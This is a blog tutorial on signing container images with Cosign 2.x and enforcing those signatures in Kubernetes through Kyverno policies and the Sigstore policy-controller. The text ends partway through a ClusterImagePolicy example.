<p>The easiest way to get Cosign on macOS is with Homebrew. The catch? Homebrew currently ships <strong>Cosign 3.x</strong>, which switched from creating separate <code>.sig</code> files to storing signatures as <strong>OCI bundles</strong>.</p>
<p>That change is great for the future, but today it breaks verification with <strong>Kyverno</strong> (and a few other tools that still expect legacy <code>.sig</code> tags).</p>
<blockquote>
<p>Installing the newest <strong>Cosign</strong> is worse than what Alice had to experience.</p>
</blockquote>
<p>If we search Homebrew, we see only one formula:</p>
<pre><code class="lang-bash">brew search cosign
==&gt; Formulae
cosign
</code></pre>
<p>So, to stay compatible with Kyverno, we’ll install <strong>Cosign 2.6.1</strong> manually using Go.</p>
<p>First, install Go and make sure your <code>$PATH</code> includes <code>$HOME/go/bin</code> (skip if you already have Go):</p>
<pre><code class="lang-bash">brew install go
<span class="hljs-built_in">echo</span> <span class="hljs-string">'export PATH="$PATH:$HOME/go/bin"'</span> &gt;&gt; ~/.zshrc
<span class="hljs-built_in">source</span> ~/.zshrc
</code></pre>
<p>Then install Cosign 2.6.1:</p>
<pre><code class="lang-bash">go install github.com/sigstore/cosign/v2/cmd/cosign@v2.6.1
</code></pre>
<p>Once installed, confirm your version:</p>
<pre><code class="lang-bash">cosign version
</code></pre>
<p>Expected output:</p>
<pre><code class="lang-bash">  ______   ______        _______. __    _______ .__   __.
 /      | /  __  \      /       ||  |  /  _____||  \ |  |
|  ,----<span class="hljs-string">'|  |  |  |    |   (----`|  | |  |  __  |   \|  |
|  |     |  |  |  |     \   \    |  | |  | |_ | |  . `  |
|  `----.|  `--'</span>  | .----)   |   |  | |  |__| | |  |\   |
 \______| \______/  |_______/    |__|  \______| |__| \__|
cosign: A tool <span class="hljs-keyword">for</span> Container Signing, Verification and Storage <span class="hljs-keyword">in</span> an OCI registry.

GitVersion:    v2.6.1
GitCommit:     unknown
GitTreeState:  unknown
BuildDate:     unknown
GoVersion:     go1.25.3
Compiler:      gc
Platform:      darwin/arm64
</code></pre>
<hr />
<h2 id="heading-generating-signing-keys">Generating Signing Keys</h2>
<p>Now onto generating our keys.</p>
<h3 id="heading-cosign-generated">Cosign Generated</h3>
<p>The easiest way to get started is to use Cosign's built-in key generation. Generate keys with the <code>generate-key-pair</code> command; it will prompt for a password for your private key.</p>
<pre><code class="lang-bash">matt.brown@matt ~ % cosign generate-key-pair
Enter password <span class="hljs-keyword">for</span> private key:
Enter password <span class="hljs-keyword">for</span> private key again:
Private key written to cosign.key
Public key written to cosign.pub
</code></pre>
<p>That gives you:</p>
<pre><code class="lang-bash">matt.brown@matt ~ % ls | grep cosign
cosign.key
cosign.pub
</code></pre>
<p>You can view the public key by simply opening the file. Who would have thought? We will need this later.</p>
<pre><code class="lang-bash">matt.brown@matt ~ % cat cosign.pub
-----BEGIN PUBLIC KEY-----
...
-----END PUBLIC KEY-----
</code></pre>
<blockquote>
<p>You can also regenerate this at any time with <code>cosign public-key --key cosign.key</code> if you ever lose the .pub file.</p>
</blockquote>
<h3 id="heading-non-cosign-generated">Non-Cosign Generated</h3>
<p>You can also use keys generated outside of Cosign; you just import them to convert them into Cosign's format.</p>
<p>Here's a quick command to generate a new elliptic-curve private key using the P-256 curve and save it as <code>private.pem</code>.</p>
<pre><code class="lang-bash">openssl ecparam -name prime256v1 -genkey -noout -out private.pem
</code></pre>
<p>Then use the Cosign import capability.</p>
<pre><code class="lang-bash">matt.brown@matt ~ % cosign import-key-pair --key private.pem
Enter password <span class="hljs-keyword">for</span> private key:
Enter password <span class="hljs-keyword">for</span> private key again:
Private key written to import-cosign.key
Public key written to import-cosign.pub
</code></pre>
<p>The end result is the same: we can now sign images.</p>
<hr />
<h2 id="heading-shipping-signed-images">Shipping Signed Images</h2>
<p>So now we have our keys set, which means we're ready for the next step: actually signing an image. You knew we'd get here at some point. We'll build the image, push it to a registry, and then sign it.</p>
<p>GitHub Container Registry is my preferred option, but Docker Hub or any other registry works too.</p>
<p>Let's build our image. You can use any image of course, but feel free to use <a target="_blank" href="https://github.com/sf-matt/hello-flask-signed">mine</a>. This is just a simple Flask app.</p>
<pre><code class="lang-bash">matt.brown@matt hello-flask-signed % docker buildx build --platform linux/amd64,linux/arm64  -t ghcr.io/sf-matt/hello-flask-signed:v1 --push .
[+] Building 5.2s (12/12) FINISHED                                                             docker:desktop-linux
 =&gt; [internal] load build definition from Dockerfile                                                           0.0s
 =&gt; =&gt; transferring dockerfile: 257B                                                                           0.0s
 =&gt; [internal] load metadata <span class="hljs-keyword">for</span> docker.io/library/python:3.12-slim     
...
</code></pre>
<p>Now sign it.</p>
<pre><code class="lang-bash">matt.brown@matt cosign-generated-keys % cosign sign --key cosign.key sfmatt/hello-flask-signed:v1
WARNING: Image reference sfmatt/hello-flask-signed:v1 uses a tag, not a digest, to identify the image to sign.
    This can lead you to sign a different image than the intended one. Please use a
    digest (example.com/ubuntu@sha256:abc123...) rather than tag
    (example.com/ubuntu:latest) <span class="hljs-keyword">for</span> the input to cosign. The ability to refer to
    images by tag will be removed <span class="hljs-keyword">in</span> a future release.
</code></pre>
<p>For some reason I thought signing by tag was a smart idea. Cosign quickly shut me down, though it doesn't do the best job of explaining why. But the reason is fairly simple.</p>
<p>Tags like <code>:v1</code> are <strong>mutable</strong>. If the tag later points to a new image, your old signature still looks valid <strong>for the tag</strong>, even though the underlying image changed. That breaks the entire trust model. The digest uniquely identifies that exact build. Once signed, no one can change what it points to without invalidating the signature.</p>
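<p>To make that concrete, here's a minimal Python sketch (purely illustrative, not part of any tooling here) of why a digest pins content while a tag doesn't: a digest is just a SHA-256 over the manifest bytes, so repointing a tag changes the digest it resolves to.</p>

```python
import hashlib

def digest(manifest_bytes: bytes) -> str:
    """Registries address an image by the SHA-256 of its manifest bytes."""
    return "sha256:" + hashlib.sha256(manifest_bytes).hexdigest()

# A tag is just a mutable name -> digest pointer in the registry.
tags = {}
v1 = b'{"layers": ["app-v1"]}'              # stand-in for a real OCI manifest
tags["v1"] = digest(v1)

# Someone pushes different content to the SAME tag...
v1_evil = b'{"layers": ["app-v1", "cryptominer"]}'
tags["v1"] = digest(v1_evil)

# ...so a signature bound to the original digest no longer matches
# what the tag now serves.
print(tags["v1"] == digest(v1))   # False: the tag points elsewhere now
print(digest(v1) == digest(v1))   # True: the digest itself never moves
```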
<p>Cosign solves this by signing <strong>by digest</strong>, not by tag. In fact, signing by tag won't even be an option in a future release. So if you didn't save the digest from the build output, let's grab it and sign that way. We'll use <strong>Crane</strong>, a lightweight CLI from Google's <code>go-containerregistry</code> project that makes it easy to inspect, copy, and manipulate container images right from the terminal. Install it via Homebrew if you don't have it.</p>
<pre><code class="lang-bash">matt.brown@matt ~ % brew install crane
matt.brown@matt hello-flask-signed % crane digest ghcr.io/sf-matt/hello-flask-signed:v1
sha256:blahblah
</code></pre>
<p>Take that returned value to sign.</p>
<pre><code class="lang-bash">matt.brown@matt cosign-generated-keys % cosign sign --key cosign.key ghcr.io/sf-matt/hello-flask-signed@sha256:blahblah
Enter password <span class="hljs-keyword">for</span> private key:
WARNING: <span class="hljs-string">"ghcr.io/sf-matt/hello-flask-signed"</span> appears to be a private repository, please confirm uploading to the transparency <span class="hljs-built_in">log</span> at <span class="hljs-string">"https://rekor.sigstore.dev"</span>
Are you sure you would like to <span class="hljs-built_in">continue</span>? [y/N] N
</code></pre>
<p>Interesting. What exactly does this mean? When you sign a <strong>private image</strong>, Cosign warns you that it's uploading metadata to the <strong>public Rekor transparency log</strong>, or <strong>tlog</strong>.</p>
<h4 id="heading-whats-actually-published">What’s actually published</h4>
<p>Cosign never uploads your image contents. From my investigation it creates just a small record containing:</p>
<ul>
<li><p>the image <strong>digest</strong> (the SHA256 hash),</p>
</li>
<li><p>your <strong>signing certificate</strong> (for keyless),</p>
</li>
<li><p>and a cryptographic proof that the entry exists in the log.</p>
</li>
</ul>
<p>This allows anyone to later verify <em>when</em> and <em>by whom</em> an image was signed. That’s great for public supply chains, but not usually necessary for <strong>internal builds</strong>.</p>
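<p>For a sense of scale, a keyed signature's Rekor entry is a small JSON record along these lines (a rough sketch of the <code>hashedrekord</code> type; treat the exact field names as illustrative):</p>

```python
import json

# Illustrative shape of a Rekor "hashedrekord" entry -- field names are
# approximate. The point: only a hash and signature material go public,
# never the image contents themselves.
entry = {
    "apiVersion": "0.0.1",
    "kind": "hashedrekord",
    "spec": {
        "data": {
            # the artifact is represented only by its digest
            "hash": {"algorithm": "sha256", "value": "blahblah"},
        },
        "signature": {
            "content": "<base64 signature>",
            "publicKey": {"content": "<base64 PEM key or cert>"},
        },
    },
}
print(json.dumps(entry, indent=2))
```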
<h4 id="heading-why-we-dont-need-rekor-here-imo">Why we don’t need Rekor here (IMO)</h4>
<p>If you’re just signing and verifying images you built to run in <strong>your cluster</strong>, you already control both the registry and the verification policy. Publishing to a public transparency log adds no security benefit. It just makes your internal image digests public.</p>
<p>So let's skip the <code>tlog</code>: we can tell Cosign not to publish to Rekor when signing private images. We also add <code>--recursive</code> to account for a multi-arch image.</p>
<pre><code class="lang-bash">cosign sign --tlog-upload=<span class="hljs-literal">false</span> --key cosign.key --recursive   ghcr.io/sf-matt/hello-flask-signed@sha256:blahblah
</code></pre>
<p>You’ll still get a valid signature that Kyverno can verify, but no public audit entry. And that's it: we have our signed image. The next question is what exactly that did.</p>
<hr />
<h2 id="heading-verifying-a-signature">Verifying a Signature</h2>
<p>So far, Cosign has given us no visible proof in the terminal that the image is signed. To confirm that it is, go ahead and <strong>verify</strong> it against our public key:</p>
<pre><code class="lang-bash">matt.brown@matt cosign-generated-keys % cosign verify \
  --key cosign.pub \
  --insecure-ignore-tlog=<span class="hljs-literal">true</span> \
  ghcr.io/sf-matt/hello-flask-signed@sha256:blahblah

WARNING: Skipping tlog verification is an insecure practice that lacks transparency and auditability verification <span class="hljs-keyword">for</span> the signature.

Verification <span class="hljs-keyword">for</span> ghcr.io/sf-matt/hello-flask-signed@sha256:blahblah--
The following checks were performed on each of these signatures:
  - The cosign claims were validated
  - The signatures were verified against the specified public key

[{<span class="hljs-string">"critical"</span>:{<span class="hljs-string">"identity"</span>:{<span class="hljs-string">"docker-reference"</span>:<span class="hljs-string">"ghcr.io/sf-matt/hello-flask-signed"</span>},<span class="hljs-string">"image"</span>:{<span class="hljs-string">"docker-manifest-digest"</span>:<span class="hljs-string">"sha256:blahblah"</span>},<span class="hljs-string">"type"</span>:<span class="hljs-string">"cosign container image signature"</span>},<span class="hljs-string">"optional"</span>:null}]
</code></pre>
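<p>That JSON blob at the end is the signed payload itself (Cosign's "simple signing" claim format). Here's a short Python sketch, using the payload printed above, of the two facts the signature actually binds together:</p>

```python
import json

# The claims Cosign printed after `cosign verify` (digest elided as in the post).
payload = json.loads(
    '[{"critical":{"identity":{"docker-reference":"ghcr.io/sf-matt/hello-flask-signed"},'
    '"image":{"docker-manifest-digest":"sha256:blahblah"},'
    '"type":"cosign container image signature"},"optional":null}]'
)

claim = payload[0]["critical"]
# The signature binds a repository identity to one exact manifest digest.
print(claim["identity"]["docker-reference"])     # ghcr.io/sf-matt/hello-flask-signed
print(claim["image"]["docker-manifest-digest"])  # sha256:blahblah
```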
<p>That’s the confirmation. But what do we have, exactly? To find the signature artifact we're looking for, let's run <code>cosign triangulate</code>.</p>
<pre><code class="lang-bash">matt.brown@matt cosign-generated-keys % cosign triangulate ghcr.io/sf-matt/hello-flask-signed@sha256:blahblah
ghcr.io/sf-matt/hello-flask-signed:sha256-blahblah.sig
</code></pre>
<p>OK, let's view the artifact in GHCR using <code>cosign tree</code>.</p>
<pre><code class="lang-bash">matt.brown@matt cosign-generated-keys % cosign tree ghcr.io/sf-matt/hello-flask-signed@sha256:blahblah
📦 Supply Chain Security Related artifacts <span class="hljs-keyword">for</span> an image: ghcr.io/sf-matt/hello-flask-signed@sha256:blahblah
└── 🔐 Signatures <span class="hljs-keyword">for</span> an image tag: ghcr.io/sf-matt/hello-flask-signed:sha256-blahblah.sig
   └── 🍒 sha256:different-blahblah
</code></pre>
<p>You can check the GitHub UI for this signature as well.</p>
<h4 id="heading-what-the-sig-image-actually-is">What the <code>.sig</code> Image Actually Is</h4>
<p>When Cosign 2.x (and earlier) signs an image, it pushes a <strong>signature artifact</strong> back into the registry. That artifact appears as a tag ending in <code>.sig</code>, as we saw with <code>ghcr.io/sf-matt/hello-flask-signed:sha256-&lt;digest&gt;.sig</code>. Behind the scenes, this is just an OCI manifest that contains a small JSON bundle with the signature, the certificate (if keyless), and an optional transparency-log proof. Cosign and tools like Kyverno automatically discover and verify this artifact when checking your image, so you never have to handle the <code>.sig</code> directly.</p>
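<p>The <code>.sig</code> tag name isn't magic: Cosign derives it from the digest with a fixed convention (swap the <code>:</code> for a <code>-</code> and append <code>.sig</code>). A quick sketch of that mapping:</p>

```python
def sig_tag(repo: str, digest: str) -> str:
    """Where Cosign (pre-3.x) stores the signature for a given image digest."""
    return f"{repo}:{digest.replace(':', '-')}.sig"

print(sig_tag("ghcr.io/sf-matt/hello-flask-signed", "sha256:blahblah"))
# ghcr.io/sf-matt/hello-flask-signed:sha256-blahblah.sig
```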
<hr />
<h2 id="heading-oidc-with-sigstore">OIDC with Sigstore</h2>
<p>For public images, we can skip local keys entirely and sign using <strong>Sigstore’s keyless mode</strong>, which authenticates you through your GitHub identity (or a few other providers) via OpenID Connect (OIDC).</p>
<p>Since this example uses a <strong>public image</strong>, you can follow along with mine:<br /><code>ghcr.io/sf-matt/hello-flask-oidc:v1</code>.</p>
<p>To sign it, just run the same command as before, but with no key flags at all.</p>
<pre><code class="lang-bash">cosign sign ghcr.io/sf-matt/hello-flask-oidc@sha256:04147f2536d03c40a3ac595de6c1c87f06924b775dc92442e0b3b04e5ed5793e
</code></pre>
<p>Cosign will open a browser window and ask you to log in with GitHub (or others). Once authenticated, it issues a short-lived signing certificate from <strong>Fulcio</strong> and uploads the signature to both the <strong>registry</strong> and the <strong>Rekor transparency log</strong>.</p>
<p>You’ll see a message confirming the signature and transparency log entry:</p>
<pre><code class="lang-bash">Retrieving signed certificate...
Successfully verified SCT...
tlog entry created with index: 672916270
Pushing signature to: ghcr.io/sf-matt/hello-flask-oidc
</code></pre>
<p>To verify the signature:</p>
<pre><code class="lang-bash">cosign verify   --certificate-identity <span class="hljs-string">"sdmattbrown@gmail.com"</span>   --certificate-oidc-issuer <span class="hljs-string">"https://github.com/login/oauth"</span>   ghcr.io/sf-matt/hello-flask-oidc@sha256:&lt;digest&gt;
</code></pre>
<p>Cosign will validate the certificate, confirm its entry in Rekor, and show the signed claims. No local keys, no password prompts, just OIDC-based signing tied to your GitHub identity.</p>
<p>Boom.</p>
<hr />
<h2 id="heading-validating-image-via-kyverno">Validating Image via Kyverno</h2>
<p>OK, let's move on to the more interesting part: Kubernetes. We start by setting up an <a target="_blank" href="https://kyverno.io/docs/policy-types/image-validating-policy/">ImageValidatingPolicy</a>. Here is an example for our initial signed image.</p>
<blockquote>
<p>If you need some guidance installing Kyverno it is just a simple Helm deploy, but more details can be found in an older <a target="_blank" href="https://cloudsecburrito.com/control-issues-real-policies-in-minutes-with-kyverno">post</a>.</p>
</blockquote>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">policies.kyverno.io/v1alpha1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">ImageValidatingPolicy</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">ghcr-check-images</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">matchConstraints:</span>
    <span class="hljs-attr">resourceRules:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">apiGroups:</span> [<span class="hljs-string">""</span>]
      <span class="hljs-attr">apiVersions:</span> [<span class="hljs-string">"v1"</span>]
      <span class="hljs-attr">operations:</span> [<span class="hljs-string">"CREATE"</span>]
      <span class="hljs-attr">resources:</span> [<span class="hljs-string">"pods"</span>]

  <span class="hljs-attr">evaluation:</span>
    <span class="hljs-attr">background:</span>
      <span class="hljs-attr">enabled:</span> <span class="hljs-literal">false</span>

  <span class="hljs-attr">validationActions:</span> [<span class="hljs-string">Deny</span>]
  <span class="hljs-attr">failurePolicy:</span> <span class="hljs-string">Ignore</span> 

  <span class="hljs-attr">attestors:</span>
  <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">cosign</span>
    <span class="hljs-attr">cosign:</span>
      <span class="hljs-attr">key:</span>
        <span class="hljs-attr">data:</span> <span class="hljs-string">|
          -----BEGIN PUBLIC KEY-----
          MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAEMitBUveNmKw57+UdJ3+mbGKlWp5B
          oWm+HWOBKap2V0Oa2whm/IHHoqReZUPdgj+fsAGyyBvSlbbfQV44zJhx5w==
          -----END PUBLIC KEY-----
</span>
  <span class="hljs-attr">validations:</span>
  <span class="hljs-bullet">-</span> <span class="hljs-attr">expression:</span> <span class="hljs-string">&gt;
      images.containers.all(i,
        (image(i).registry() == "ghcr.io" &amp;&amp;
        image(i).repository().startsWith("sf-matt/"))
          ? verifyImageSignatures(i, [attestors.cosign]) &gt; 0
          : true
      )
</span>    <span class="hljs-attr">message:</span> <span class="hljs-string">all</span> <span class="hljs-string">images</span> <span class="hljs-string">from</span> <span class="hljs-string">ghcr.io/sf-matt</span> <span class="hljs-string">must</span> <span class="hljs-string">have</span> <span class="hljs-string">a</span> <span class="hljs-string">valid</span> <span class="hljs-string">Cosign</span> <span class="hljs-string">signature</span>
</code></pre>
<p>This Kyverno <strong>ImageValidatingPolicy</strong> does the following:</p>
<ul>
<li><p><strong>Scope:</strong> Applies to all Pod <code>CREATE</code> operations.</p>
</li>
<li><p><strong>Target:</strong> Only evaluates images pulled from <code>ghcr.io/sf-matt</code>.</p>
</li>
<li><p><strong>Attestor:</strong> Uses an embedded <strong>Cosign public key</strong> for signature verification.</p>
</li>
<li><p><strong>Logic:</strong> Runs <code>verifyImageSignatures()</code> on each container image.</p>
</li>
<li><p><strong>Enforcement:</strong> Denies workloads if any image from your GHCR namespace isn’t signed by that trusted key.</p>
</li>
<li><p><strong>Behavior:</strong> Ignores other registries and disables background scans (evaluation happens only at creation).</p>
</li>
</ul>
<p>In short: if it comes from your namespace and isn’t cryptographically signed, it never runs.</p>
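<p>The CEL expression above is compact but dense. Here's the same decision logic sketched in Python for readability, with a stand-in <code>is_signed</code> callback playing the role of <code>verifyImageSignatures()</code>:</p>

```python
def allowed(images, is_signed):
    """Mirror of the policy's CEL: only gate images from our GHCR namespace.

    `is_signed` stands in for Kyverno's verifyImageSignatures() attestor check.
    """
    for image in images:
        registry, _, repository = image.partition("/")
        if registry == "ghcr.io" and repository.startswith("sf-matt/"):
            if not is_signed(image):
                return False  # deny: our image, no trusted signature
    return True  # everything else is out of scope and admitted

signed = {"ghcr.io/sf-matt/hello-flask-signed@sha256:abc"}
print(allowed(["ghcr.io/sf-matt/hello-flask-signed@sha256:abc"], signed.__contains__))  # True
print(allowed(["ghcr.io/sf-matt/backdoor@sha256:def"], signed.__contains__))            # False
print(allowed(["docker.io/library/nginx:latest"], signed.__contains__))                 # True
```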
<p>A problem arises if your GitHub Container Registry (GHCR) package is private, as it is in this example: Kyverno needs credentials to pull and verify signatures. You can provide these using a standard Kubernetes <code>Secret</code> of type <code>dockerconfigjson</code>.</p>
<p>Generate a GitHub Personal Access Token (classic or fine-grained) with <strong>read:packages</strong> permission,<br />then create the secret in the same namespace where Kyverno runs (usually <code>kyverno</code>). Running it imperatively is easy enough.</p>
<pre><code class="lang-bash">kubectl create secret docker-registry ghcr-creds   --docker-server=ghcr.io   --docker-username=&lt;your-github-username&gt;   --docker-password=&lt;your-personal-access-token&gt;   --docker-email=&lt;your-email&gt;   -n kyverno
</code></pre>
<p>Confirm creation:</p>
<pre><code class="lang-bash">kubectl get secret ghcr-creds -n kyverno
</code></pre>
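<p>Under the hood, <code>kubectl create secret docker-registry</code> just wraps a small JSON document. Here's a sketch of the <code>.dockerconfigjson</code> payload it produces, with hypothetical placeholder credentials:</p>

```python
import base64
import json

# What `kubectl create secret docker-registry` packs into .dockerconfigjson.
# The username/token here are hypothetical placeholders, not real credentials.
username, token = "sf-matt", "ghp_example_token"
auth = base64.b64encode(f"{username}:{token}".encode()).decode()

dockerconfig = {
    "auths": {
        "ghcr.io": {
            "username": username,
            "password": token,
            "auth": auth,  # base64("user:password") -- what registries actually read
        }
    }
}

# The Secret's data field holds this JSON, base64-encoded once more by Kubernetes.
secret_data = base64.b64encode(json.dumps(dockerconfig).encode()).decode()
print(base64.b64decode(auth).decode())  # sf-matt:ghp_example_token
```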
<p>Then reference the secret inside your <strong>ImageValidatingPolicy</strong> using the <code>credentials</code> field. This tells Kyverno to use your GHCR credentials when verifying Cosign signatures for private images.</p>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">policies.kyverno.io/v1alpha1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">ImageValidatingPolicy</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">ghcr-check-images</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">matchConstraints:</span>
    <span class="hljs-attr">resourceRules:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">apiGroups:</span> [<span class="hljs-string">""</span>]
      <span class="hljs-attr">apiVersions:</span> [<span class="hljs-string">"v1"</span>]
      <span class="hljs-attr">operations:</span> [<span class="hljs-string">"CREATE"</span>]
      <span class="hljs-attr">resources:</span> [<span class="hljs-string">"pods"</span>]

  <span class="hljs-attr">evaluation:</span>
    <span class="hljs-attr">background:</span>
      <span class="hljs-attr">enabled:</span> <span class="hljs-literal">false</span>

  <span class="hljs-attr">validationActions:</span> [<span class="hljs-string">Deny</span>]
  <span class="hljs-attr">failurePolicy:</span> <span class="hljs-string">Ignore</span> 

  <span class="hljs-attr">credentials:</span>
    <span class="hljs-attr">providers:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-string">"github"</span>
    <span class="hljs-bullet">-</span> <span class="hljs-string">"default"</span> 
    <span class="hljs-attr">secrets:</span> 
    <span class="hljs-bullet">-</span> <span class="hljs-string">"ghcr-creds"</span>

  <span class="hljs-attr">attestors:</span>
  <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">cosign</span>
    <span class="hljs-attr">cosign:</span>
      <span class="hljs-attr">key:</span>
        <span class="hljs-attr">data:</span> <span class="hljs-string">|
          -----BEGIN PUBLIC KEY-----
          MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAEoYIRqyJPEOGk84mh9W3XWA42dOPm
          UE03IhLs2sLnRPegfWAO+6mSy8pbEO8R5orKIXqHWq2fz8s6UG9iTXbaRQ==
          -----END PUBLIC KEY-----
</span>      <span class="hljs-attr">ctlog:</span>
        <span class="hljs-attr">insecureIgnoreTlog:</span> <span class="hljs-literal">true</span>
        <span class="hljs-attr">url:</span> <span class="hljs-string">"https://rekor.sigstore.dev"</span>


  <span class="hljs-attr">validations:</span>
  <span class="hljs-bullet">-</span> <span class="hljs-attr">expression:</span> <span class="hljs-string">&gt;
      images.containers.all(i,
        (image(i).registry() == "ghcr.io" &amp;&amp;
        image(i).repository().startsWith("sf-matt/"))
          ? verifyImageSignatures(i, [attestors.cosign]) &gt; 0
          : true
      )
</span>    <span class="hljs-attr">message:</span> <span class="hljs-string">all</span> <span class="hljs-string">images</span> <span class="hljs-string">from</span> <span class="hljs-string">ghcr.io/sf-matt</span> <span class="hljs-string">must</span> <span class="hljs-string">have</span> <span class="hljs-string">a</span> <span class="hljs-string">valid</span> <span class="hljs-string">Cosign</span> <span class="hljs-string">signature</span>
</code></pre>
<p>But here's the problem I've run into: it looks the secret up as if it were a cluster-scoped object. If you turn up the log verbosity you can see the following request, note the path is <code>/api/v1/secrets/ghcr-creds</code> with no namespace segment, so the lookup 404s.</p>
<pre><code class="lang-bash">2025-11-03T22:22:02Z -5 k8s.io/client-go@v0.33.3/transport/round_trippers.go:632 &gt; Response logger=klog milliseconds=1 status=<span class="hljs-string">"404 Not Found"</span> url=https://10.96.0.1:443/api/v1/secrets/ghcr-creds v=6 verb=GET
</code></pre>
<p>It will work if you switch the image to public, but that sort of defeats the point of what we're trying to do here. So let's switch to a good old <code>ClusterPolicy</code> with <code>verifyImages</code>.</p>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">kyverno.io/v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">ClusterPolicy</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">check-ghcr-image</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">webhookConfiguration:</span>
    <span class="hljs-attr">failurePolicy:</span> <span class="hljs-string">Fail</span>
    <span class="hljs-attr">timeoutSeconds:</span> <span class="hljs-number">30</span>
  <span class="hljs-attr">background:</span> <span class="hljs-literal">false</span>
  <span class="hljs-attr">rules:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">check-ghcr-image</span>
      <span class="hljs-attr">match:</span>
        <span class="hljs-attr">any:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">resources:</span>
            <span class="hljs-attr">kinds:</span>
              <span class="hljs-bullet">-</span> <span class="hljs-string">Pod</span>
      <span class="hljs-attr">verifyImages:</span>
      <span class="hljs-bullet">-</span> <span class="hljs-attr">imageReferences:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-string">"ghcr.io/sf-matt/hello-flask*"</span>
        <span class="hljs-attr">failureAction:</span> <span class="hljs-string">Enforce</span>
        <span class="hljs-attr">attestors:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">entries:</span>
          <span class="hljs-bullet">-</span> <span class="hljs-attr">keys:</span>
              <span class="hljs-attr">publicKeys:</span> <span class="hljs-string">|-
                  -----BEGIN PUBLIC KEY-----
                  MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAEoYIRqyJPEOGk84mh9W3XWA42dOPm
                  UE03IhLs2sLnRPegfWAO+6mSy8pbEO8R5orKIXqHWq2fz8s6UG9iTXbaRQ==
                  -----END PUBLIC KEY-----
</span>              <span class="hljs-attr">rekor:</span>
                <span class="hljs-attr">ignoreTlog:</span> <span class="hljs-literal">true</span>
                <span class="hljs-attr">url:</span> <span class="hljs-string">https://rekor.sigstore.dev</span>
                <span class="hljs-attr">pubkey:</span> <span class="hljs-string">|-
                  -----BEGIN PUBLIC KEY-----
                  MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAEoYIRqyJPEOGk84mh9W3XWA42dOPm
                  UE03IhLs2sLnRPegfWAO+6mSy8pbEO8R5orKIXqHWq2fz8s6UG9iTXbaRQ==
                  -----END PUBLIC KEY-----
</span>              <span class="hljs-attr">ctlog:</span>
                <span class="hljs-attr">ignoreSCT:</span> <span class="hljs-literal">true</span>
                <span class="hljs-attr">pubkey:</span> <span class="hljs-string">|-
                  -----BEGIN PUBLIC KEY-----
                  MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAEoYIRqyJPEOGk84mh9W3XWA42dOPm
                  UE03IhLs2sLnRPegfWAO+6mSy8pbEO8R5orKIXqHWq2fz8s6UG9iTXbaRQ==
                  -----END PUBLIC KEY-----</span>
</code></pre>
<p>And now you should be able to deploy it just fine. And if you have Policy Reporter running you can see it pass. </p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1762214498308/4a6c7192-5523-444a-892a-be452e1ac534.png" alt class="image--center mx-auto" /></p>
<p>You actually wouldn’t have been able to see that for <code>ImageValidatingPolicy</code>. Another plus for <code>ClusterPolicy</code>.</p>
<hr />
<h2 id="heading-sigstore-policy-controller">Sigstore Policy Controller</h2>
<p>Going through the process of validating with Kyverno feels quite clunky. So let's try another way.</p>
<p>In the Sigstore docs I found their <a target="_blank" href="https://github.com/sigstore/policy-controller/tree/main">Policy Controller</a>, which is just an admission controller. So let's try using <strong>Sigstore policy-controller</strong> to accomplish the same as what we did with Kyverno.</p>
<p>We'll use the Cosign-generated keypair from before (or create a new one), and you can reuse the previous app or build a fresh one.</p>
<h3 id="heading-install-policy-controller">Install Policy-Controller</h3>
<p>Let's get started with installing policy-controller.</p>
<pre><code class="lang-bash">helm repo add sigstore https://sigstore.github.io/helm-charts
helm repo update
helm upgrade --install policy-controller sigstore/policy-controller   -n cosign-system --create-namespace
</code></pre>
<p>Then label the namespace you want to test in.</p>
<blockquote>
<p>Beware: once a namespace is labeled, any image that doesn’t match at least one policy will be blocked from deploying.</p>
</blockquote>
<pre><code class="lang-bash">kubectl label namespace default policy.sigstore.dev/include=<span class="hljs-literal">true</span>
</code></pre>
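<p>If that default-deny behavior worries you, the policy-controller config supports a <code>no-match-policy</code> setting so unmatched images warn instead of being blocked. A sketch, with the ConfigMap name and key taken from the policy-controller docs (worth double-checking against your chart version):</p>
<pre><code class="lang-yaml">apiVersion: v1
kind: ConfigMap
metadata:
  name: config-policy-controller   # name assumed from the policy-controller docs
  namespace: cosign-system
data:
  no-match-policy: warn            # default is deny; warn admits the image but logs it
</code></pre>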
<p>Now we have our newest Admission Controller installed. Let's create a <strong>ClusterImagePolicy</strong> that requires a signature from your keypair, with the <strong>public key</strong> (PEM) inlined.</p>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">policy.sigstore.dev/v1beta1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">ClusterImagePolicy</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">require-cosign-keypair</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">mode:</span> <span class="hljs-string">enforce</span>
  <span class="hljs-attr">images:</span>
